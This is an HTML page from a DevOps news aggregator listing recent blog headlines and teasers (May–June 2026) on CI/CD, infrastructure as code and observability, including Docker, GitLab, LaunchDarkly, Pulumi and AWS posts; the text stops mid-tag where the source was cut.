<p><strong>📅 May 27, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/mitigating-cve-2026-31431-copy-fail-in-docker-engine/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-untrusted-autonomous-workload-how-ai-coding-agents-reshape-what-isolation-has-to-do" class="group relative scroll-mt-24">
        <a href="#h3-the-untrusted-autonomous-workload-how-ai-coding-agents-reshape-what-isolation-has-to-do" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Untrusted Autonomous Workload: How AI Coding Agents Reshape What Isolation Has to Do
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-untrusted-autonomous-workload-how-ai-coding-agents-reshape-what-isolation-has-to-do"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Earlier this year I mass-migrated my blog to Astro using Claude Code. 146 posts. 6,024 images. Canonical URLs, JSON-LD markup, sitemap generation, the whole stack. I&#39;d spent hours writing a skills fil</p>
<p><strong>📅 May 26, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/untrusted-autonomous-workload-ai-sandboxes/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cicd" class="group relative scroll-mt-24">
        <a href="#h2-cicd" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🔄 CI/CD
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-cicd"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-the-complete-ai-experimentation-guide-test-compare-validate-ship-safely" class="group relative scroll-mt-24">
        <a href="#h3-the-complete-ai-experimentation-guide-test-compare-validate-ship-safely" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Complete AI Experimentation Guide: Test, Compare, Validate & Ship Safely
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-complete-ai-experimentation-guide-test-compare-validate-ship-safely"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Artificial intelligence tools, particularly large language models (LLMs), aren’t like traditional software.</p>
<p><strong>📅 May 30, 2026</strong> • <strong>📰 LaunchDarkly Blog</strong></p>
<p><a href="https://launchdarkly.com/blog/ai-experimentation/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-release-management-tools-what-they-are-and-how-they-work" class="group relative scroll-mt-24">
        <a href="#h3-release-management-tools-what-they-are-and-how-they-work" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Release management tools: What they are and how they work
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-release-management-tools-what-they-are-and-how-they-work"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p><strong>📅 May 30, 2026</strong> • <strong>📰 LaunchDarkly Blog</strong></p>
<p><a href="https://launchdarkly.com/blog/release-management-tools/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-feature-flags-vs-feature-branching-why-you-need-both-for-faster-safer-releases" class="group relative scroll-mt-24">
        <a href="#h3-feature-flags-vs-feature-branching-why-you-need-both-for-faster-safer-releases" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Feature Flags vs Feature Branching: Why You Need Both for Faster, Safer Releases
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-feature-flags-vs-feature-branching-why-you-need-both-for-faster-safer-releases"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Feature flags control features after deployment, while feature branching manages code before merge</p>
<p><strong>📅 May 30, 2026</strong> • <strong>📰 LaunchDarkly Blog</strong></p>
<p><a href="https://launchdarkly.com/blog/feature-flags-vs-feature-branching/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-bigquery-cicd-with-harness-database-devops" class="group relative scroll-mt-24">
        <a href="#h3-bigquery-cicd-with-harness-database-devops" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 BigQuery CI/CD with Harness Database DevOps
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-bigquery-cicd-with-harness-database-devops"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Automate BigQuery schema deployments with Harness using secure OIDC authentication and CI/CD pipelines. | Blog</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/bigquery-ci-cd-and-database-devops-with-harness"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-still-a-developer-just-outside-our-latest-github-shop-collection-is-here" class="group relative scroll-mt-24">
        <a href="#h3-still-a-developer-just-outside-our-latest-github-shop-collection-is-here" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Still a developer. Just outside. Our latest GitHub Shop collection is here.
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-still-a-developer-just-outside-our-latest-github-shop-collection-is-here"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The ESC collection lets you escape the confines of your desk and get out into the sun where good ideas are bound to happen. The post Still a developer. Just outside. Our latest GitHub Shop collection </p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/news-insights/company-news/still-a-developer-just-outside-our-latest-github-shop-collection-is-here/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gitlab-patch-release-1901-18114-18107" class="group relative scroll-mt-24">
        <a href="#h3-gitlab-patch-release-1901-18114-18107" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitLab Patch Release: 19.0.1, 18.11.4, 18.10.7
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-gitlab-patch-release-1901-18114-18107"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p><strong>📅 May 28, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://docs.gitlab.com/releases/patches/patch-release-gitlab-19-0-1-released/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-claude-opus-48-on-gitlab-complex-agentic-work-less-disruption" class="group relative scroll-mt-24">
        <a href="#h3-claude-opus-48-on-gitlab-complex-agentic-work-less-disruption" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Claude Opus 4.8 on GitLab: Complex agentic work, less disruption
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-claude-opus-48-on-gitlab-complex-agentic-work-less-disruption"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Anthropic&#39;s latest model on GitLab is built for precise execution across complex multi-step agent work. Agents fail most often on complex, multi-step work: tasks that span multiple tools and go from i</p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/claude-opus-4-8-on-gitlab/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-agentic-coding-is-only-as-good-as-its-context" class="group relative scroll-mt-24">
        <a href="#h3-agentic-coding-is-only-as-good-as-its-context" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Agentic coding is only as good as its context
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-agentic-coding-is-only-as-good-as-its-context"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Every week, another coding agent demo shows a prompt turning into a pull request in under five minutes. These demos often highlight a narrow use case not yet in production, and they skip everything th</p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/agentic-coding-only-as-good-as-context/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-best-continuous-deployment-tools-in-2026" class="group relative scroll-mt-24">
        <a href="#h3-the-best-continuous-deployment-tools-in-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Best Continuous Deployment Tools in 2026
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-best-continuous-deployment-tools-in-2026"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Continuous Deployment is not the same as CI/CD. An honest ranking of the platforms that handle the deploy half: rollouts, traffic shifting, rollback, environment promotion.</p>
<p><strong>📅 May 27, 2026</strong> • <strong>📰 Railway Blog</strong></p>
<p><a href="https://blog.railway.com/p/best-continuous-deployment-tools-2026"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-full-security-scanner-coverage-of-your-codebase-in-minutes" class="group relative scroll-mt-24">
        <a href="#h3-full-security-scanner-coverage-of-your-codebase-in-minutes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Full security scanner coverage of your codebase in minutes
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-full-security-scanner-coverage-of-your-codebase-in-minutes"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Across the industry, every CI/CD platform faces the same challenge: As organizations grow, manually configuring scanners to run across every pipeline definition file isn&#39;t scalable. AI is accelerating</p>
<p><strong>📅 May 26, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/security-configuration-profiles/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-github-for-beginners-getting-started-with-git-and-github-in-vs-code" class="group relative scroll-mt-24">
        <a href="#h3-github-for-beginners-getting-started-with-git-and-github-in-vs-code" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitHub for Beginners: Getting started with Git and GitHub in VS Code
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-github-for-beginners-getting-started-with-git-and-github-in-vs-code"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Discover how to use VS Code to interact with GitHub and maintain your projects. The post GitHub for Beginners: Getting started with Git and GitHub in VS Code appeared first on The GitHub Blog.</p>
<p><strong>📅 May 25, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/developer-skills/github/github-for-beginners-getting-started-with-git-and-github-in-vs-code/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-iac" class="group relative scroll-mt-24">
        <a href="#h2-iac" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🏗️ IaC
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-iac"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-stop-managing-start-orchestrating-streamlining-catalyst-operations-with-red-hat-ansible-automation-platform" class="group relative scroll-mt-24">
        <a href="#h3-stop-managing-start-orchestrating-streamlining-catalyst-operations-with-red-hat-ansible-automation-platform" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Stop managing, start orchestrating: Streamlining catalyst operations with Red Hat Ansible Automation Platform
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-stop-managing-start-orchestrating-streamlining-catalyst-operations-with-red-hat-ansible-automation-platform"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Modern enterprise networks demand speed, consistency, and absolute resilience. Relying on manual, time-consuming network management tasks is no longer a viable strategy for organizations seeking true </p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/stop-managing-start-orchestrating-streamlining-catalyst-operations-red-hat-ansible-automation-platform"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-connect-customer-now-supports-scheduling-tasks-up-to-90-days-in-advance" class="group relative scroll-mt-24">
        <a href="#h3-amazon-connect-customer-now-supports-scheduling-tasks-up-to-90-days-in-advance" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon Connect Customer now supports scheduling tasks up to 90 days in advance
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-amazon-connect-customer-now-supports-scheduling-tasks-up-to-90-days-in-advance"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Amazon Connect Customer now supports scheduling tasks up to 90 days in advance, helping organizations plan, route, and track long-running follow-up work. For example, an insurance team managing an aut</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/05/amazon-connect-customer-tasks-90day-schedule"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-generating-a-pulumi-provider-from-an-openapi-spec" class="group relative scroll-mt-24">
        <a href="#h3-generating-a-pulumi-provider-from-an-openapi-spec" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Generating a Pulumi Provider from an OpenAPI Spec
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-generating-a-pulumi-provider-from-an-openapi-spec"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Today, we are announcing v1.0 of the Pulumi Service Provider: a major milestone in managing Pulumi Cloud with Pulumi itself. The provider is now generated directly from the Pulumi Cloud OpenAPI specif</p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/generating-a-pulumi-provider-from-an-openapi-spec/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-stop-tuning-prompts-build-a-harness" class="group relative scroll-mt-24">
        <a href="#h3-stop-tuning-prompts-build-a-harness" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Stop Tuning Prompts. Build a Harness.
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-stop-tuning-prompts-build-a-harness"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Anthropic shipped a piece earlier this month called How Claude Code Works in Large Codebases. I have not read anything more useful about coding agents this year. The core claim, in their words: “the e</p>
<p><strong>📅 May 26, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/stop-tuning-prompts-build-a-harness/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-observability" class="group relative scroll-mt-24">
        <a href="#h2-observability" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📊 Observability
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-observability"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-mlops-lifecycle-stages-workflow-and-best-practices" class="group relative scroll-mt-24">
        <a href="#h3-mlops-lifecycle-stages-workflow-and-best-practices" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 MLOps Lifecycle: Stages, Workflow, and Best Practices
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-mlops-lifecycle-stages-workflow-and-best-practices"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Understand the MLOps lifecycle from data preparation to monitoring.</p>
<p><strong>📅 May 30, 2026</strong> • <strong>📰 LaunchDarkly Blog</strong></p>
<p><a href="https://launchdarkly.com/blog/mlops-lifecycle/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-ses-now-offers-inbox-placement-metrics-and-blocklist-monitoring" class="group relative scroll-mt-24">
        <a href="#h3-amazon-ses-now-offers-inbox-placement-metrics-and-blocklist-monitoring" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon SES now offers inbox placement metrics and blocklist monitoring
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-amazon-ses-now-offers-inbox-placement-metrics-and-blocklist-monitoring"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Today, Amazon Simple Email Service (SES) launched a new set of deliverability features that help customers get more information about their outbound sending deliverability performance and reputation. </p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/05/amazon-ses-global-deliverability/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-announcing-trento-version-31" class="group relative scroll-mt-24">
        <a href="#h3-announcing-trento-version-31" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Announcing Trento Version 3.1
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-announcing-trento-version-31"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
